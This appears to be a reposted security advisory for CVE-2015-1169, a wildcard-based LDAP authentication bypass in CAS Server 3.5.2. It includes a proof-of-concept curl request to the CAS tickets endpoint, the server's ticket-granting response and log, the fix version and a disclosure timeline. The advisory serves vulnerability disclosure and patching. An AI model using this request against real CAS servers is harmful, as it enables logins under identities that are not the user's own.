CAS Server 3.5.2 LDAP Authentication Bypass

2015.01.22

Credit: Jose Tozo

Risk: High

Local: No

Remote: Yes

CVE: CVE-2015-1169

CWE: CWE-74

Ogólna skala CVSS: 7.5/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

=====[Alligator Security Team - Security Advisory]========

  CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP
authentication via crafted wildcards.

  Reporter: Jos Tozo  < juniorbsd () gmail com >

=====[Table of Contents]==================================

1. Background
2. Detailed description
3. Other contexts & solutions
4. Timeline
5. References

=====[1. Background]======================================

 CAS is an authentication system originally created by Yale University to
provide a trusted way for an application to authenticate a user.

=====[2. Detailed description]============================

A valid username and password required.

Given a username johndoe and a password superpass, you can sucessfully
achieve login using wildcards:

username: jo*
password: superpass

The login will be sucessfully only if the ldap bind search return one
unique member.

The vulnerability described in this document can be validated using the
following example:

Client Request:
root@machine:/# curl -k -L -d "username=jo%2A&password=superpass"
https://login.cas-server.com/v1/tickets

(note that * was url encoded to %2A)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
   <head>
      <title>201 The request has been fulfilled and resulted in a new
resource being created</title>
   </head>
   <body>
      <h1>TGT Created</h1>
      <form action="
https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz"
method="POST">Service:<input type="text" name="service" value=""><br><input
type="submit" value="Submit"></form>
   </body>
</html>

Server log:
=============================================================
WHO: [username: jo*]
WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz
ACTION: TICKET_GRANTING_TICKET_CREATED
APPLICATION: CAS
WHEN: Tue Jan 20 18:38:17 BRST 2015
CLIENT IP ADDRESS: xxx.xxx.xxx.xxx
SERVER IP ADDRESS: xxx.xxx.xxx.xxx
=============================================================

=====[3. Other contexts & solutions]======================

 In order to apply the patch, you have to update at least to version 3.5.3.
Newer versions, such as CAS 4.0.0 and above, are not vulnerable.

=====[4. Timeline]========================================

29/12/14 Vendor notification.
14/01/15 Vendor rolled out new version 3.5.3
17/01/15 Mitre assigned CVE-2015-1169.
21/01/15 Disclosure date.

=====[5. References]=======================================

1 - https://github.com/Jasig/cas/pull/411
2 -
https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c

-- 
Grato,

 Tozo

Referencje:

https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CAS Server 3.5.2 LDAP Authentication Bypass

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.